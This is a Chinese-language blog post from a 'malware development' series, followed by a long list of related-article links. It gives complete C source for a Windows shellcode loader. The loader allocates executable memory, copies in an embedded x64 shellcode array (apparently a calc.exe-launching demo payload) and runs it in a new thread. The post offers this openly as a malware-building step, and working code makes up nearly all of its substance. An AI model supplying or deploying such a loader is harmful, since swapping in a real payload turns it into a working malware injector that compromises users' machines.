惡意軟體開發——編寫第一個Loader載入器

Carlison丶發表於2021-09-01

一、什麼是shellcode loader？

上一篇文章說了，我們說到了什麼是shellcode，為了使我們的shellcode載入到記憶體並執行，我們需要shellcode載入器，也就是我們的shellcode loader。當然編寫Loader不止侷限於C/C++，你也可以使用Python、Golang等語言編寫載入器

二、動手實現一個載入器

下面我們開始動手實踐編寫一個shellcode Loader，需要用到我們之前學到的記憶體相關API和函式

#include <Windows.h>
// 需要的標頭檔案

// 入口函式
int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode長度
    DWORD dwThreadId; // 執行緒ID
    HANDLE hThread; // 執行緒控制程式碼

// calc的shellcode
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// 獲取shellcode大小
shellcode_size = sizeof(buf);

/*
VirtualAlloc(
    NULL, // 基址
    800,  // 大小
    MEM_COMMIT, // 記憶體頁狀態
    PAGE_EXECUTE_READWRITE // 可讀可寫可執行
    );
*/

// 申請一塊具有可讀寫執行許可權的記憶體空間
char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,
    MEM_COMMIT,
    PAGE_EXECUTE_READWRITE
    );


// 將shellcode複製到可執行的記憶體頁中
CopyMemory(shellcode,buf,shellcode_size);

// 建立一個在呼叫程式的虛擬地址空間內執行的執行緒 
hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 棧的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函式
    NULL, // 引數
    NULL, // 執行緒標誌
    &dwThreadId // 執行緒ID
    );

WaitForSingleObject(hThread,INFINITE); // 一直等待執行緒執行結束
    return 0;
}

編譯執行，成功彈出計算器

Qealler - 一個用Java編寫的惡意病毒軟體
2019-02-08
Java
惡意軟體開發——記憶體相關API
2021-08-28
記憶體API
D語言編譯器被多個防毒軟體誤報是惡意程式
2018-11-02
編譯防毒
Zero Access惡意軟體分析
2020-08-19
載入頁面：網站如何導致使用者感染惡意軟體
2013-02-27
網站
最新 Mac 惡意軟體 OSX/CrescentCore 被發現
2019-07-02
Mac
編寫軟體動態載入NT式驅動
2013-07-24
[資訊]（1.12）惡意軟體LockPos使用了一種新的注入技術來逃避殺軟的檢測；首款由Kotlin編寫的安卓惡意軟體
2018-01-12
Kotlin安卓
webpack loader—自己寫一個按需載入外掛
2018-09-04
Web
linux ddos惡意軟體分析
2020-08-19
Linux
惡意軟體Linux/Mumblehard分析
2020-08-19
Linux
【活在中國】誰是惡意軟體？
2010-02-07
惡意軟體開發——shellcode執行的幾種常見方式
2021-08-31
熱衷遊戲作弊及破解？小心下載了惡意軟體
2022-09-16
遊戲
Network Box:北京成全球最大惡意軟體發源地
2007-09-25
JShelter：一個反惡意軟體Web瀏覽器擴充套件外掛
2021-10-08
JSWeb瀏覽器套件
惡意軟體PE檔案重建指南
2020-08-19
是防毒軟體”失職“還是惡意軟體太”狡猾“?惡意軟體可繞過Android防護系統
2021-06-24
防毒Android
防止惡意攻擊，伺服器DDoS防禦軟體科普
2023-11-22
伺服器
NSS Labs：微軟在阻止惡意軟體的下載方面最佳
2013-05-15
微軟
webpack配置常用loader載入器
2017-09-08
Web
Android中-Loader載入器
2017-04-30
Android
rust druid編寫第一個窗體
2022-07-20
RustUI
一個delphi開發的惡意程式程式碼薦
2010-05-10
阻止 WannaCry 的英雄將豁免因開發惡意軟體引發的牢獄之災
2019-07-28
寫作業系統之開發載入器
2021-10-16
作業系統
谷歌向開發者開放惡意軟體攔截工具包
2015-03-26
谷歌
TrickBot和Emotet再奪惡意軟體之冠
2020-11-21
動態惡意軟體分析工具介紹
2020-11-08
常見惡意軟體型別及危害
2022-10-21
型別
惡意軟體Emotet 的新攻擊方法
2022-03-01
惡意軟體橫行，DNS“功”不可沒
2017-07-03
DNS
這個大學生黑客有點狂！釋出42個惡意軟體，下載量超800萬
2019-10-25
黑客
如何編寫一個 Redux 中介軟體
2017-12-04
Redux
微軟研究：非正版軟體惡意軟體感染率為80%
2012-03-13
微軟
新惡意軟體使用Tor在MacOSX系統開啟“後門”
2017-07-06
Mac
iOS 11開發教程（二）編寫第一個iOS 11應用
2017-10-16
iOS
Trickbot惡意軟體又又又升級了！
2021-02-03

惡意軟體開發——編寫第一個Loader載入器

一、什麼是shellcode loader？

二、動手實現一個載入器

相關文章